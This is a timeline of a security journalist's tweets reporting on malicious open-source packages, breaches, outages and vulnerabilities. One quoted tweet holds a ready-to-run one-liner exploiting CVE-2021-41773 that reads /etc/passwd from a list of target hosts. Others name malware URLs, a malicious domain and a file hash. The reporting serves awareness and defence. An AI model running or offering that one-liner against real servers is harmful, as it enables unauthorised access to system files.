Security Researcher | Tech Journalist | 📰 Bylines + seen on: BBC, BleepingComputer, Channel 5, TechCrunch | ✉️ ax@hey.ax

🇨🇦🇬🇧
A GitHub flaw lets attackers upload executables that appear to be hosted on a company's official repo, such as Microsoft's—without the repo owner knowing anything about it. The following URLs, for example, make it seem like these ZIPs are present on Microsoft's source code repo: https://github[.]com/microsoft/vcpkg/files/14125503/Cheat.Lab.2.7.2.zip https://github[.]com/microsoft/STL/files/14432565/Cheater.Pro.1.6.0.zip But they are not. These ZIPs are #malware. An attacker, while commenting on any GitHub commit/PR, can "attach" a file that gets assigned a URL slug containing the name of the repo where the comment was made. Even if the comment is never actually posted or later deleted by the attacker, the link to the file remains live! And, the repo owner (Microsoft in this case) would have no knowledge of or control over such files. Threat actors have been abusing this flaw to distribute malicious executables under the false pretense that these are coming from credible organizations' code repos.
49
1,089
4,888
792,501
A threat actor is now advising StackOverflow devs seeking debugging help to install a 'pytoileur' #Python package as a "solution" to their code troubles. 🛑DO NOT fall for this, it's a trap—the package has encoded code hidden on line 17 via whitespaces and infects Windows users with #trojan as soon as it's installed! sonatype.com/blog/pypi-crypt… #opensource #malware
17
225
1,205
186,028
EXCLUSIVE: #Okta says its GitHub source code repositories were stolen this December in a 'confidential' security notification sent to 'security contacts' that include IT managers at various organizations.
12
200
619
236,500
🚨 Apache has disclosed an *actively exploited* Path traversal flaw in the #opensource "httpd" server. Over 112,000 exposed Apache servers run version 2.4.49, and should be upgraded now! New fix checks for encoded path traversal characters e.g. /../.%2E/ blog.sonatype.com/apache-ser…
10
306
518
Uber won't fix the vulnerability that lets anyone email as "Uber"—this isn't a spoofed email but sent from Uber via an exposed endpoint. Researcher @0x21SAFE states threat actors could abuse this to phish 57 million victims of the 2016 Uber data breach. bleepingcomputer.com/news/se…
15
147
512
Anonymous altered the official knowledgebase of Epik after the alt-right web hosting provider denied that any breach had occurred. Epik has provided services for the Texas GOP, 8chan, Parler, and Gab, among others. arstechnica.com/information-… #EpikFail
12
133
444
EXCLUSIVE: Newly discovered #Azure flaw lets attackers brute-force Active Directory credentials in an undetected manner. At this time, there's no way to easily block the endpoints used by Seamless SSO. #Microsoft seems to consider this a "design" choice. arstechnica.com/information-…
18
294
519
GitHub calls these "anonymized URLs" but I'm not sure if that's accurate—considering they appear to be associated with a repo. By contrast, Discord CDN URLs to "attachments" are truly anonymized and look like: https://cdn.discordapp[.]com/attachments/XXXXX/XXXX/virus.exe
4
24
486
59,474
BREAKING: eFile[.]com, an IRS-authorized U.S. tax return software provider, was caught serving #JavaScript malware for weeks—as early as March 17th, and up until at least April 1st. bleepingcomputer.com/news/se… h/t @malwrhunterteam @johullrich
9
123
305
51,526
PyTorch reveals malicious dependency chain compromise between Dec 25th & 30th. The counterfeit 'tortchtrion' stole SSH keys, first 1000 files in $HOME, .gitconfig and other secrets. 2,300+ downloads seen so far on PyPI. Uninstall now 👇👇👇 bleepingcomputer.com/news/se… #opensource
4
131
267
68,016
BREAKING: #PHP Git server is the latest victim of a software supply chain attack in which attackers planted a remote code execution #backdoor in the PHP source code. PHP powers almost 8 out of 10 sites on the internet, making this upstream attack noteworthy. #opensource #git
PHP's Git server hacked to add backdoors to PHP source code - @Ax_Sharma bleepingcomputer.com/news/se…
3
174
211
CVE-2023-29218 👀 Twitter Recommendation Algorithm... allows attackers to cause a denial of service (reduction of reputation score) by arranging for multiple Twitter accounts to coordinate negative signals regarding a target account, such as unfollowing, muting, blocking,...
8
61
204
85,784
Package is part of a wider ("Cool package") campaign infiltrating Python registries like PyPI since 2023. Multiple such similar typosquatting packages contain hidden obfuscated or encoded code, designed to drop persistent Windows malware as soon as these are installed.
2
11
177
23,810
BREAKING: UN #DataBreach exposed over 100,000 employee records and travel history due to publicly accessible '.git' directories and credential files. "Threat actors likely already have the data," state researchers @Kirtaner @johnjhacking @JacksonHHax @nicksahler
United Nations data breach exposed over 100k UNEP staff records - @Ax_Sharma bleepingcomputer.com/news/se…
2
31
183
#Golang, #Rustlang "net" library is impacted by the severe IP address validation vulnerability previously found in Netmask. Over 4 million results for "import net" on GitHub. Kubernetes also cherry-picked the fix. CVE-2021-29922 & CVE-2021-29923👇👇👇 bleepingcomputer.com/news/se…
4
72
179
EXCLUSIVE: Ringleader of a massive fake news empire, 'Hacker X' comes out. Through extensive efforts, he created an untraceable webring of HUNDREDS of 'news' sites to spread conspiracy theories, propaganda to tip the 2016 US Election in Trump's favor. arstechnica.com/information-…
12
69
131
2022 starts with Y2K22 bug: Emails getting stuck in Microsoft Exchange on-prem servers... 🤯 The cause? The FIP-FS malware scanning service that uses signed 'int32' format and can't fit '2022' 🥵💣 Here's a temporary workaround until MS releases a fix
Microsoft Exchange '2022' FIP-FS bug causes emails to get stuck - @LawrenceAbrams bleepingcomputer.com/news/te…
6
60
138
🇨🇦 Canada's major banks: RBC, CIBC, Scotiabank, TD Bank, BMO all affected by a mysterious, hours-long outage. Customers report e-transfers getting auto-rejected, access issues with online and mobile banking, and being stuck at grocery store checkouts. bleepingcomputer.com/news/se…
10
62
108
An exposed #GitHub repo leaked personal info of some Adafruit users on or before 2019: * names * email addresses * street addresses * order details Real data seems to have been used for a training data set that got committed to a public repo. blog.adafruit.com/2022/03/04… #DataLeak
7
30
111
Northern Ireland has temporarily suspended its COVID "vaccine passport" certification service following a data leak—some users seeing data of other users. The incident has been reported to UK's IPO. Not all users are impacted 👇👇👇 bleepingcomputer.com/news/se… #databreach #dataleak
7
61
104
Phishing actors are targeting verified Twitter users as Twitter has been relentlessly removing blue badges from "incorrectly verified" accounts this week: bleepingcomputer.com/news/se…
2
25
97
Turns out "netmask" has had yet another bug fix made in version 2.0.1 on #npm for the critical IP address validation #vulnerability as fixes for CVE-2021-28918 were deemed incomplete. This was spotted by @ryotkak and a newer CVE-2021-29418 has now been assigned. #opensource
2
19
90
One of the largest Vietnamese crypto trading apps, ONUS suffered a #Log4J hack, followed by a $5 million extortion demand. After ONUS refused to pay the ransom, threat actors put up 2 million customer records, databases, & ID/passport images up for sale. bleepingcomputer.com/news/se…
4
31
76
More power to the crew! They let this obnoxious, self-entitled man off too easy. So wish law enforcement was called to greet the 'unruly passenger' on landing. Baffling.
2
1
63
92,535
From fake #TikTok livestreams, to Midjourney being abused to make AI art — in this in-depth investigation, @Hannah_Gelbart & I delve into all the tricks scammers are playing to exploit the ecological disaster in #Turkey and Syria to steal your donations. bbc.com/news/world-europe-64…
3
38
60
20,092
#npm malware stealing Chrome passwords with a real password recovery tool disguised as "TeamViewer.exe" was itself amusing enough. It just gets better when #malware author has a dump of their own plaintext passwords exposed🙃 Research by @ReversingLabs. #opensource #SupplyChain
2
21
60
EXCLUSIVE: A vulnerability (CVE) advisory from MITRE accidentally exposed over a dozen vulnerable systems—since at least April 2022. bleepingcomputer.com/news/se…
4
14
60
HaveIBeenPwned is alerting over 15 million users, including non-Epik customers who are impacted by the data breach. Epik's multi-gig dump leaked by Anonymous also includes a 16 GB SQL database of scraped WHOIS records. arstechnica.com/information-… #EpikFail #databreach
1
27
38
Researcher refuses Telegram’s #BugBounty reward over the terms of agreement, and discloses the flaw with "self-destruct" feature that took months to resolve. arstechnica.com/information-…
1
4
46
"Upon investigation, we have concluded that such access was used to copy Okta code repositories," writes David Bradbury, the company's Chief Security Officer (CSO) in the email. bleepingcomputer.com/news/se…
1
11
37
12,499
Kubernetes 1.24 coming out later today will be the first release to officially use #Sigstore—enabling seamless signature verification to protect against supply chain attacks across the 5.6M developer community, explains @lorenc_dan of @chainguard_dev blog.sigstore.dev/kubernetes…
15
45
Another neat GitHub trick. The following URL makes it look like both the commit and the .txt file are from the google/leveldb repo—but they are not: https://raw.githubusercontent[.]com/google/leveldb/2286a0cedd18b65255e7e54dc18630972420b7d6/test-file.txt
2
9
42
6,673
BREAKING: Atlassian is asking enterprise Jira Data Center customers to patch this critical #RCE. Deserialization #vulnerability stems from unrestricted access to ports 40001 and 40011 in an Ehcache RMI network service, that remote attackers can exploit. bleepingcomputer.com/news/se…
2
19
38
Russia-based dev Yaffle altered 'event-source-polyfill' #npm package in March to show anti-war messages to Russians, as a a peaceful protest. This marks the THIRD major #opensource self-sabotage of 2022: npm package is downloaded 600K weekly and used by 135,000+ GitHub repos.
3
19
37
1. 35k code hits, not repos. 2.13k of these results are from just one (relatively unimportant) repo. 3. Rest of the repos are clones of projects, not original projects hijacked. Impact is far smaller than what is hyped here. Granted, still a spammy mess for GitHub to clean up.
2
17
37
Gmail just went down. #GmailDown
5
6
34
31,506
⚠️ Just because a library name itself contains a higher version number doesn't mean it's the newer or legit version of an official lib. 'colors-2.0', colors-3.0'... that keep surfacing on #npm have nothing to do with 'colors' but pack malware blog.sonatype.com/remember-n… #Opensource
4
16
38
Too much chatter about an *unconfirmed* RCE in Spring Core — based on 1 minor commit that deprecates Java deserialization in one of the classes. Spring Core dev @Sam_Brannen confirms this is NOT a flaw, but a mere warning to anyone practicing untrusted deseriazation.
2
14
35
BREAKING: Turns out Python 3.x standard library "ipaddress" also has the octal IP address parsing #vulnerability that had previously impacted "netmask" Introduced due to a 2019 regression bug Credit: @sickcodes @koroeskohr @johnjhacking @kaoudis @tensor_bodega, et al #opensource
Python also impacted by critical IP address validation vulnerability - @Ax_Sharma bleepingcomputer.com/news/se…
1
16
35
Replying to @Ax_Sharma @0x21SAFE
Apparently, not the first time either that this was reported... nitter.app/ShivaSMaharaj/status/1… nitter.app/wld_basha/status/14776…
hey mate! i reported same vulnerability back in march 2021 and they closed it as informative and didn't start crying like a baby
1
4
33
In her book "Manipulated," former White House CIO @TrackerPayton describes 'Hacker X' in detail, but it is the first time he's being publicly named. amazon.com/dp/B084SQXNXS?btk… Special thanks to @packmatt73, Theresa Payton, and many sources who helped fact-check the story.
3
9
24
NEW: Heavily obfuscated #Python #malware caught on #opensource PyPI repo. It pulls now-deleted GitHub scripts to mine cryptocurrency on your computer. Although deleted, some of the Bash scripts could be recovered after some searching: blog.sonatype.com/sonatype-c… via @sonatype
24
32
Reddit users spotted the issue as early as March 17th when they noticed an SSL error message thrown by eFile[.]com which appeared to be fake.
1
5
31
9,821
💩 Sh*t gifting website ShitExpress hacked exposing customer email addresses, orders, and HYSTERICAL personalized messages customers had sent with their "gifts." The hacker posted the #dataleak on a forum: bleepingcomputer.com/news/se…
12
31
Python package 'onyxproxy' is an info-stealer using Unicode homoglyphs to evade detection. A real-world example of Trojan Source attack vector used in #opensource malware. Discovery by @Phylum_IO bleepingcomputer.com/news/se… Reporting by @BillToulas
14
32
4,473
RubyInstaller[.]org's Wikis poisoned since Nov 29th, 2022 with links to malware and IP tracing/logging site, IPlogger. Malware ZIP: e811cea654c10c0efe2618bf9d20e60c15497e8207cf5d8096aa75bab1e28573 #opensource
2
13
31
7,389
Why a #Doge in place of Twitter logo? 🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️🤦‍♂️
6
3
30
5,718
BREAKING: Researcher @alxbrsn hacked Microsoft, Apple, Tesla, Uber, Netflix, more in a novel #opensource software supply chain attack via dependency hijacking. But @sonatype's automated #malware detection system has been a step ahead, learn how: blog.sonatype.com/dependency…
3
20
28
Kinda cool. npm package 'speedy-ts-compiler' downloads another package which is empty... but the code simultaneously and elegantly obtains your username via 'npm get cache' and exfiltrates it. PoC research by @Ajay_Kulal blog.sonatype.com/distractio… #OpenSource
8
29
His team created several Facebook groups appealing to the Trump voter base where these "news" articles were shared, boosting the sites' 3 million monthly readership to 30 million. Articles generated by 'Hacker X' were retweeted by prominent personalities and unwary voters alike.
1
7
21
Over 21,000 U.S. driver licenses are up for sale on a hacker forum, along with credit reports. Forum post spotted by @UnderTheBreach. The seller says they have managed to charge $400 for every 10k copies. securityreport.com/21000-u-s… #databreach
2
9
22
New "Stark for Chrome" extension allows developers to bake accessibility into products and bridge the #disability divide. Extension: chrome.google.com/webstore/d… More info: getstark.co/blog/hello-world
3
4
28
The '2FA Authenticator' Android app with 10,000+ installs on Google Play did provide real MFA functionality but... ran a hidden 'UpdateService' to download a malicious APK from domain: ⚠️ privacyandroidapp[.]club
1
8
22
PoC exploit now out for Azure Active Directory brute forcing flaw. Microsoft maintains it's not a vulnerability but appears to be working on a solution. Includes additional commentary from @DrAzureAD @Secureworks. 👇👇👇 arstechnica.com/information-…
1
8
28
#GitHub Actions abused to run #CryptoMining #malware automatically on #GitHub servers. * Needs no action from the project maintainer * Seen targeting at least 95 #opensource repos * Runs mislabeled "npm.exe" with attacker's wallet address Discovered by @JustinPerdok
GitHub Actions is being abused to mine cryptocurrency on GitHub servers in an automated attack. Attack requires no action by the targeted project that is forked. Cryptominer executes as soon as the Pull Request is filed. - @Ax_Sharma bleepingcomputer.com/news/se…
1
16
24
Popular hacking mag Hacker Noon resolves stored XSS #security #vulnerability which could let clever hackers steal user data via SVG profile avatars. An AxDB Exclusive: medium.com/axdb/stored-cross… #cybersecurity #infosec #javascript #privacy #hacking #xss #security #hackernoon
30
29
"Tracked as CVE-2021-41773, the vulnerability is the result of an incomplete path normalization logic implemented in the Apache HTTP server 2.4.49 that in turn introduced a vulnerability."
1
1
26
BREAKING: A major #BGP leak last night impacted over 20,000 ASNs/networks around the world. According to @kentikinc, some U.S. companies were also affected. bleepingcomputer.com/news/se… Analysis by @DougMadory @anurag_bhatia #outage #networksecurity #securitynews #infosec
1
15
25
⚠️ Dish Network 📡 OUTAGE: Websites and Dish Anywhere app down for days with no explanation. Employees seem to be clueless too. theverge.com/2023/2/24/23613… cc @DISHNews @Dish
8
14
26
19,472
"Why aren’t we sending an email to every user? We evaluated the risk and consulted with our privacy lawyers and legal experts, and took the approach that... mitigated any issues while being open and transparent and did not believe emailing directly was helpful in this case."
4
1
24
BTW, "are" is a legitimate PyPI package from @andreilapets -- the researchers meant "aryi" (now removed). Luckily, caught this while writing my report.
8 malicious PyPI packages w/ 30,000 downloads found by @jfrog can: * Steal credit card numbers stored in web browsers * Steal Discord tokens and sensitive info * Perform recon. (gather screenshots/files and upload em to Discord webhook) bleepingcomputer.com/news/se… #Python #malware
11
22
The tainted 'popper.js' file, loaded on almost every eFile[.]com page, contains a base64-encoded one-liner further loading malicious JS from another domain:
1
2
22
2,553
Popular GitHub project 'qr.js' used by QR code apps got hit with a "repo hijack." Although NPM version of 'qr.js' is safe for now, devs including a Facebook engineer are seeking #opensource alternatives to this heavily used #JavaScript QR code encoder. blog.sonatype.com/researcher…
11
23
Despite stealing Okta's source code, attackers did not gain unauthorized access to the Okta service or customer data, says the company. "HIPAA, FedRAMP or DoD customers" remain unaffected and no customer action is needed.
2
2
22
8,323
...And it gets a PoC
CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
1
24
Community does not seem pleased🍿🔥 github.com/RIAEvangelist/nod…
3
1
25
And, they were right. The 'update.js' file eventually loaded by the malicious code contains base64 string which is HTML code with this very SSL error message, as analyzed by @BleepinComputer.
1
2
22
2,293
Dark web marketplace CanadianHQ 🇨🇦 shut down by CRTC. The site's patrons traded illicit goods and services including stolen credit card numbers, and illegal drugs. Images via @DarkDotFail
3
13
21
Malicious PyMafka package drops Cobalt Strike on Windows, macOS and appears to typosquat #opensource PyKafka, Apache Kafka client for Python. blog.sonatype.com/new-pymafk… #malware
1
15
23
🍿 Severity of CVE-2022-22963—SpEL Injection in Spring Cloud Function was bumped up from a Medium to CRITICAL just now 👀 h/t @wayfaring_life tanzu.vmware.com/security/cv… cc @LawrenceAbrams @wdormann
3
17
24
Although this may have started out as a peaceful "non-destructive" protest by the developer with 'peacenotwar' module, the addition of blatantly destructive payload to 'node-ipc' raised serious concerns in the community ⚠️ given the dev also maintains ~40 popular npm packages.
1
2
21
The malicious JavaScript file 'update.js', further attempts to prompt users to download next stage payload, depending on whether they are using Chrome [update.exe] or Firefox [installer.exe].
1
4
18
4,155
And, it gets worse. PoC exploits for CVE-2021-41773 reveal it can evolve into full-on Remote Code Execution (RCE) on both Linux and Windows servers. h/t @hackerfantastic @wdormann @timb_machine
Actively exploited Apache 0-day also allows remote code execution - @Ax_Sharma bleepingcomputer.com/news/se…
3
13
21
8 malicious PyPI packages w/ 30,000 downloads found by @jfrog can: * Steal credit card numbers stored in web browsers * Steal Discord tokens and sensitive info * Perform recon. (gather screenshots/files and upload em to Discord webhook) bleepingcomputer.com/news/se… #Python #malware
9
20
Throwback Monday 😃
20
Newer versions 11.0.0 and above released for 'node-ipc' STILL continue to contain the 'peacenotwar' module that will generate text files propounding "peace" message on the Desktops of infected users:
2
1
19
PSA: CVE-2022-31289 is *NOT* a vulnerability or even a bug. The writeup on it was rushed without following any responsible disclosure and after half-baked "research."
blog.sonatype.com/nexus-repo… @pmmali_ @HackerGautam @shifacyclewala here's the opportunity to set the record straight on your blog and reports.
1
7
18
By all means, call @ubuntu @Microsoft out but why publicly name the representative? Are they even aware you leaked a private msg naming them?
8
16
In addition to using drive-by downloads and trojanized 'browser updates' to spread itself, #LummaC2 crypto-stealer now targets Python developers by imitating popular cryptocurrency libraries like 'crytic-compile'. The illicit package 'crytic-compilers' drops Lumma ⚠️ sonatype.com/blog/crytic-com…
1
1
19
1,990
Clop #ransomware just removed @AxisBank, India's third largest private bank roughly two days after I'd reached out to Axis.
3
8
18
7,125
PyPI #malware 'botaa3' - a poor typosquatting attempt at mimicking Amazon AWS SDK for Python 'boto3'. Has XOR-encrypted code to: * Exfil. data * Give attacker C2 capabilities: upload, download, browse, delete,... * Kill itself blog.sonatype.com/another-da… on @sonatype #opensource
4
18
'secretslib' PyPI package drops fileless malware to evade detection. Malicious payload injected in memory is a Monero cryptominer. Threat actor even used 'Author' info of an engineer working for a U.S. Department of Energy-funded national lab. blog.sonatype.com/pypi-packa… #opensource
1
2
20
Just had another (verified) Dish Network employee reach out to me confirming on background that the company has indeed been "cyber attacked." The employee received a written note from their manager stating, "it was caused by an outside bad actor, a known threat."
4
11
18
22,439
and @breakaway71 No author, but regret looking into this. 😖 for public service, I must advise, do not click. web.archive.org/web/20200904…
12
1
15
Proofpoint's @sherrod_im warns of over 2.8 million instances of scammers soliciting donations via fraudulent crypto wallet addresses.
1
2
13
Too early to conclude that an incident indeed at TELUS or rule out third-party vendor breach. Employee names do check out though and correspond to present-day technical staff, like devs.
2
4
16
3,481